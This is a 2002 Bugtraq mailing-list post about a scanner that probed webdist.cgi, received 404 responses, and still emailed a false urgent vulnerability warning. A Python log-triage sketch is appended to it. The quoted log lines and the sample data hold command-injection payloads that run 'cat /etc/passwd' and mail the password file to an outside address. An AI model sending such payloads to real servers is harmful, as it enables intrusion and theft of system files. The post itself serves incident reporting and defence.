From: zeno (bugtraq_at_cgisecurity.net)
Date: Fri Sep 06 2002 - 10:03:47 CDT

    I got the following scans in my logs yesterday.

    68.46.64.23 - - [05/Sep/2002:17:37:37 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-"
    68.46.64.23 - - [05/Sep/2002:17:44:13 -0400] "GET /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[vulnthreezee.com] HTTP/1.0" 404 2656 "-" "-"
    68.46.64.23 - - [05/Sep/2002:17:49:22 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-"

    Now I got the following email today.

    > This is an automated message:
    >
    > This system was scanned by GoogleMaker 1.0, and is found to have a
    > vulnurability. Please contact a system administrator.
    >
    > Vulnurability: Vulnerability in webdist.cgi
    > Information: http://www.cert.org/advisories/CA-1997-12.html
    >
    >
    > URGENT - URGENT - URGENT
    >
    > Thank you,
    > TZSecurity.
    >
    >

    What is funny about this is that I do not run this software and they are reporting I do.
    Seems this person's scanner can't figure out what 404 codes mean. I am reporting this mostly
    for the fact that if they are reporting false information to me they are probably doing so
    to others and people should be aware.

    Visiting the site I see that it is webattack.com editor's pick. Tip for webattack not to pick
    sites who can't tell the difference between 404 and 200.

    Regards,

    - zenocgisecurity.com
     
     

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
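
Added example, not part of the original post: a log triage sketch for the situation described above, which separates webdist.cgi probes that got a 404 (script not present) from probes the server actually answered. The function names, verdict strings and the two 192.0.2.10 lines are constructed for illustration; the first two sample lines are the ones quoted in the post.

```python
import re
from urllib.parse import unquote

# Apache combined log: host ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
# A webdist.cgi request carrying shell metacharacters or /etc/passwd is a probe.
PROBE_RE = re.compile(r'/cgi-bin/webdist\.cgi\?.*(;|\||`|/etc/passwd)', re.I)

def classify(line):
    """Return (host, status, verdict) for a webdist.cgi probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    if not PROBE_RE.search(unquote(m.group("target"))):
        return None
    status = int(m.group("status"))
    if status == 404:
        verdict = "probe, script not present"
    elif 200 <= status < 300:
        # A 2xx is not proof of compromise (custom error pages also return 200),
        # but it is the case that needs a human to look at the response.
        verdict = "probe answered, investigate"
    else:
        verdict = "probe, check response manually"
    return m.group("host"), status, verdict

def summarize(lines):
    """Count verdicts per source host."""
    summary = {}
    for line in lines:
        hit = classify(line)
        if hit:
            host, _, verdict = hit
            per_host = summary.setdefault(host, {})
            per_host[verdict] = per_host.get(verdict, 0) + 1
    return summary

SAMPLE = [
    # Quoted in the post:
    '68.46.64.23 - - [05/Sep/2002:17:37:37 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-"',
    '68.46.64.23 - - [05/Sep/2002:17:44:13 -0400] "GET /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[vulnthreezee.com] HTTP/1.0" 404 2656 "-" "-"',
    # Constructed (documentation address 192.0.2.10):
    '192.0.2.10 - - [05/Sep/2002:18:01:02 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 200 812 "-" "-"',
    '192.0.2.10 - - [05/Sep/2002:18:01:05 -0400] "GET /index.html HTTP/1.0" 200 4096 "-" "-"',
]

if __name__ == "__main__":
    for host, verdicts in summarize(SAMPLE).items():
        print(host, verdicts)
```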